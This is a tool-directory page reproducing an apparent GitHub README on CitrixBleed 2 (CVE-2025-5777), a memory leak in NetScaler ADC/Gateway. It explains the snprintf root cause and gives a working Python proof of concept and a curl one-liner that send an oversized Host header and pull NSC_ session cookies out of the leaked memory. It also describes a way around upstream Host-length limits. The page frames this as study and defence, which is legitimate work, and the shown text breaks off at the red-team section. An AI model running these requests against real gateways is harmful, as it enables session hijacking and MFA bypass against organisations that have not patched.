Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CitrixBleed-2-CVE-2025-5777-PoC- — 详细讲解CitrixBleed 2 — CVE-2025-5777(越界泄漏)PoC 和检测套件 | Kitploit
Tools/GitHubGitHub/mingshenhk/citrixbleed-2-cve-2025-5777-poc-
Defensive ToolsVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & EducationRed TeamingIncident Response

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Labs & Practice
GitHubmingshenhk/citrixbleed-2-cve-2025-5777-poc-

CitrixBleed-2-CVE-2025-5777-PoC-

详细讲解CitrixBleed 2 — CVE-2025-5777(越界泄漏)PoC 和检测套件

View Repository
172141 year agoNot yet reviewed
Share

CitrixBleed 2 (CVE-2025-5777) Ultimate Analysis

An Out-of-Bounds Memory Read in NetScaler ADC / Gateway — A Comprehensive Guide from Root Cause to Offensive and Defensive Exercises


poc usage: python3 poc.py https://gateway.example.com

exp usage: python3 exp.py https://gateway.example.com admin 7acbb35f4d...

Table of Contents

0x00  Introduction / Overview
0x01  Background: NetScaler Architecture and CitrixBleed 1 Review
0x02  Vulnerability Description (Affected Versions, CVSS, Exploitation Consequences)
0x03  Trigger Mechanism Deep Dive (Source-level Analysis & Debug Screenshots)
0x04  Minimal PoC + Advanced Scanning Script
0x05  Red Team Perspective: Full Attack Chain (Discovery → Leak → Session Hijack → Lateral Movement)
0x06  Blue Team Perspective: Detection, Forensics, and Patch Verification
0x07  Defense Hardening: Patches, WAF, Configuration, Asset Governance
0x08  Learning / Review Roadmap and Hands-on Lab
Appendix A  Sigma / Suricata / Nginx-Lua Rules
Appendix B  Patch/Exploit Timeline & IoC Snapshot
References

0x00 Introduction / Overview

  • CVE-2025-5777 (also known as CitrixBleed 2) is an Out-of-Bounds Memory Read in Citrix NetScaler ADC / Gateway.
  • Attackers do not require authentication; sending a single GET request with an overly long Host header can cause the device to "spray" random memory blocks along with the HTTP response to the client.
  • The leaked data often contains critical materials such as NSC_USER / NSC_TASS cookies, SAML StateContext, MFA tokens, which can be directly reused to achieve session takeover and MFA bypass ([arcticwolf.com][1], [tenable.com][2]).
  • CVSS v4 base score 9.3 (Critical) ([netscaler.com][3]).
  • Disclosed on 2025-06-17; on 2025-06-23 Citrix expanded the scope of impact and released patches; within a week security vendors such as ReliaQuest, Bishop Fox observed a surge in in-the-wild exploitation ([reliaquest.com][4], [bishopfox.com][5]).

0x01 Background

1.1 NetScaler Workflow Overview

┌──────────────┐
│ Client       │ ① HTTPS
└──────┬───────┘
       │
┌──────▼───────┐
│ NetScaler    │ ② AAA / Gateway Authentication
│  (WebProc)   │
└──────┬───────┘
       │
┌──────▼───────┐
│ ICA Proxy /  │ ③ Forward to Application
│ CVPN / RDP   │
└──────────────┘

NetScaler adopts a multi-process + internal IPC design. WebProc handles most HTTP requests under the AAA / Gateway path, including /nf/auth/*, /oauth/*, etc. It heavily uses snprintf() / memcpy() in C language, assembling XML/HTML fragments each time.

1.2 CitrixBleed 1 (CVE-2023-4966) Review

  • In 2023, a similar vulnerability occurred in the OAuth discovery endpoint /oauth/idp/.well-known/openid-configuration.
  • The essence is the same: using the return value of snprintf as the len parameter for subsequent send() → out-of-bounds memory echo.
  • CitrixBleed 2 proves that the same type of secure coding defect still lurks in other paths.

Lesson Learned: If security patches only target the "falling point" rather than the "programming paradigm", they leave room for "templated reproduction".


0x02 Vulnerability Description

FieldContent
CVECVE-2025-5777
AliasCitrixBleed 2
Vulnerability TypeOut-of-Bounds Read / Information Disclosure
CVSS v4 Base9.3 (Crit.) ([netscaler.com][3])
Affected Versions< 14.1-43.56 ; < 13.1-58.32 ; 13.1-37.235-FIPS/NDcPP ; 12.1-55.327-FIPS ([netscaler.com][3])
Exploitation ConditionsNetScaler is configured as Gateway (VPN/ICA Proxy/CVPN/RDP Proxy) or AAA virtual server ([arcticwolf.com][1])
ConsequencesMemory leak → Session tokens → Authentication bypass / MFA bypass → Lateral movement

0x03 Trigger Mechanism Deep Dive

This section is based on decompilation of firmware 13.1-55.18 + gdb debugging, compiled with public blog posts ([bishopfox.com][5]).

3.1 Vulnerability Entry Point

  • URI: /nf/auth/startwebview.do
  • Controllable Parameter: HTTP Host header
  • This endpoint is used to generate the redirect XML for Citrix Workspace WebView. Example normal response:
<AuthenticateResponse>
  <wv:StartUrl>https://gateway.example.com/Citrix/AAA/start.html</wv:StartUrl>
  ...
</AuthenticateResponse>

3.2 Key Function Chain

citrix_webview_handler()
 ├─ build_auth_xml()
 │    ├─ snprintf(buf, 0x1800, TEMPLATE, host_hdr, ... );
 │    └─ return length;           // ⚠️ length can be > 0x1800
 └─ ns_vpn_send_response(conn, 0x980200, buf, length);

Bug Point: snprintf returns the "length that should have been written" instead of the actual written length; if the user-supplied Host > 0x1800 - constant segment length, then length > sizeof(buf).

3.3 Runtime Illustration

buf: [-----XML-----][OOB][OOB][OOB]......            <- 0x1800 bytes limit
                          ↑
                Sent together by ns_vpn_send_response

GDB breakpoint demonstration (key registers):

RDI (dst) = 0x7fffa2e31800  // buf
RSI (len) = 0x00001e42      // length=7746 (>6144)

read() result shows that the last 1600 bytes come from uninitialized memory, where cookie buffers of other SSL sessions are visible.

3.4 Categories of Leaked Data

CategoryExample Fragment (Sanitized)
Session CookieSet-Cookie: NSC_USER=john.doe;NSC_TASS=abc123...
MFA/OTP Tokenradius_state=0e2a9c6d1553...
Other Request Body<username>audituser</username><password>***</password>

0x04 PoC Implementation

4.1 Single-file Python (15 lines)

#!/usr/bin/env python3
# CVE-2025-5777 Minimal PoC  (authorized testing ONLY)
import requests, sys, urllib3, re
urllib3.disable_warnings()

if len(sys.argv) != 2:
    exit(f"Usage: {sys.argv[0]} https://NSVIP")

url = sys.argv[1].rstrip("/") + "/nf/auth/startwebview.do"
hdr = {"Host": "A" * 0x6000}               # >0x1800 triggers
r = requests.get(url, headers=hdr, verify=False, timeout=10)

print("[+] HTTP", r.status_code, "bytes:", len(r.content))
hits = re.findall(br"(NSC_[A-Z]+=[^;]{10,})", r.content)
for h in hits: print("  Cookie leak ->", h.decode())

open("leak.bin", "wb").write(r.content)
print("[+] Saved leak.bin for offline grep.")
  • If the response returns 200 + several KB, the device is considered vulnerable.
  • Further grep leak.bin for keywords such as Cookie=, <AuthenticateContext>.

4.2 Bash / curl One-liner

curl -ks -H "Host: $(python -c 'print(\"A\"*6000)')" \
     https://NSVIP/nf/auth/startwebview.do -o leak.bin

Bypass: Some devices have Host length restrictions on upstream F5/Nginx; you can bypass by concatenating multiple subdomains, e.g., foo.foo.foo.…foo.example.com (repeat foo 3000 times).


0x05 Red Team Perspective: Full Attack Chain

Download Tool